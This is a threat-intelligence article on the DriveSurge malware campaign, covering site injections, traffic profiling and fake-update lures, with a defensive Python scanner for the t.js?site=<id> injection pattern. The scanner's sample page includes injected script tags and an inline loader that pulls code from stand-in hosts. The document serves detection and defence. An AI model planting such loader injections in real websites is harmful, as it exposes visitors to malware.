Overview
A large‑scale malware distribution campaign led by a threat actor known as DriveSurge has compromised thousands of websites, redirecting unsuspecting visitors to malware‑delivery infrastructure. According to SilentPush Labs, the campaign leverages two social‑engineering techniques — ClickFix and FakeUpdates — to infect systems and harvest credentials.
DriveSurge operates as an initial access broker (IAB) under a pay‑per‑install (PPI) model, selling access to compromised endpoints for follow‑on attacks.
Attack Flow

The campaign uses a Traffic Distribution System (TDS) called zTDS, an open‑source framework active since 2015, to profile visitors and determine which lure — ClickFix or FakeUpdates — is most effective.
| Stage | Technique | Objective |
|---|---|---|
| Website Compromise | Injection of malicious JavaScript (t.js?site=<id>) | Redirect visitors to malware infrastructure |
| Traffic Profiling | zTDS evaluates OS, browser, and region | Selects appropriate lure |
| ClickFix Attack | Victims copy and execute PowerShell commands | Installs malware under guise of fixing issues |
| FakeUpdates Attack | Fake browser update prompts (Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, UC Browser) | Triggers malicious downloads |
| Payload Delivery | ZIP archive with DLLs and Browser Update.exe | Deploys malware and establishes persistence |
SilentPush researchers identified eight technical fingerprints linking the campaign’s infrastructure, including 80 malicious injection domains and pre‑weaponized sites awaiting activation.
Technical Insights
The ClickFix technique hijacks the clipboard and manipulates command execution, while FakeUpdates delivers malicious executables disguised as legitimate browser updates.
A highlighted case involved a fake Firefox update that downloaded a ZIP archive containing multiple DLLs and a malicious executable named Browser Update.exe.
Researchers also discovered an obfuscated JavaScript payload targeting macOS systems, confirming that DriveSurge’s reach extends beyond Windows environments.
Mitigation Steps
To defend against DriveSurge’s tactics, users and administrators should:
- Download updates only from official menus (e.g., About > Check for Updates).
- Avoid executing unknown commands in PowerShell or Terminal.
- Scan websites for JavaScript injections following the t.js?site=<id> pattern.
- Monitor for zTDS traffic and redirect anomalies.
- Educate users about social‑engineering lures disguised as technical fixes or updates.
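The scanning step above can be automated. The following Python scanner is an added example written for this article; it is not code from SilentPush or from the campaign report. It assumes the injected loader shows up either as a `<script src="...t.js?site=<id>">` tag or as a quoted URL built inside an inline script, and that the site id is alphanumeric; the hostnames, site ids and sample page are constructed for the demonstration and are not indicators from the report.

```python
"""
Scanner for the t.js?site=<id> script-injection pattern described in the report.
Added example (not SilentPush's or the article's code). Assumes the injected loader
is referenced as a <script src=...> tag or as a quoted URL in an inline script;
all hostnames and site ids below are constructed sample data.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Path/query shape from the report: .../t.js?site=<id>. The id charset is an assumption.
INJECTION_RE = re.compile(r"/t\.js\?[^\s'\"<>]*?\bsite=(?P<id>[A-Za-z0-9_-]+)", re.IGNORECASE)
# Quoted URL inside inline JS that points at a t.js loader (assumption: loader built client-side).
QUOTED_URL_RE = re.compile(r"""['"]((?:https?:)?//[^'"\s]*?/t\.js\?[^'"\s]*)['"]""", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []       # values of <script src=...>
        self.inline = []     # bodies of <script>...</script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        self._in_script = True
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def find_injections(html, page_host):
    """Return a list of findings for every script reference on the page that
    matches the t.js?site=<id> pattern. Each finding records the URL, the
    site id, the host serving the loader, whether that host differs from the
    page's own host, and where the reference was found."""
    collector = ScriptCollector()
    collector.feed(html)

    candidates = [(src, "script-src") for src in collector.srcs]
    for body in collector.inline:
        candidates += [(url, "inline-loader") for url in QUOTED_URL_RE.findall(body)]

    findings, seen = [], set()
    for url, where in candidates:
        m = INJECTION_RE.search(url)
        if not m or url in seen:
            continue
        seen.add(url)
        # Relative src (no host) is served by the page itself.
        host = urlparse(url).netloc.lower() or page_host.lower()
        findings.append({
            "url": url,
            "site_id": m.group("id"),
            "host": host,
            "third_party": host != page_host.lower(),
            "where": where,
        })
    return findings


# Constructed sample page: two benign scripts, one injected tag, one inline loader.
SAMPLE_PAGE = """<!doctype html><html><head>
<script src="/assets/app.js"></script>
<script src="https://cdn.vendor.test/lib.min.js"></script>
<script src="//static.bad-injector.test/t.js?site=4821"></script>
<script>
var s=document.createElement('script');
s.src='https://other-injector.test/t.js?site=9901&v=2';
document.head.appendChild(s);
</script>
</head><body><p>Welcome</p></body></html>"""

if __name__ == "__main__":
    for f in find_injections(SAMPLE_PAGE, "www.victim-site.test"):
        print(f"{f['where']:14} site={f['site_id']:6} host={f['host']} "
              f"third_party={f['third_party']} url={f['url']}")
```

Run it against saved copies of your own site's pages (for example, pulled by a crawler on a schedule) and treat any hit, and especially a third-party host, as a page to pull from the injection and clean. Matching on the path and query shape rather than on a fixed domain list is deliberate: the report notes 80 injection domains plus pre-weaponized sites awaiting activation, so a domain blocklist alone will lag behind the campaign.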
Expert in the Cloud Insight
The DriveSurge campaign exemplifies the evolution of social‑engineering malware distribution — blending legitimate site hijacking with adaptive lures powered by traffic profiling.
For defenders, the takeaway is clear: visibility into web scripts, browser update integrity, and user education are now critical components of modern cyber resilience.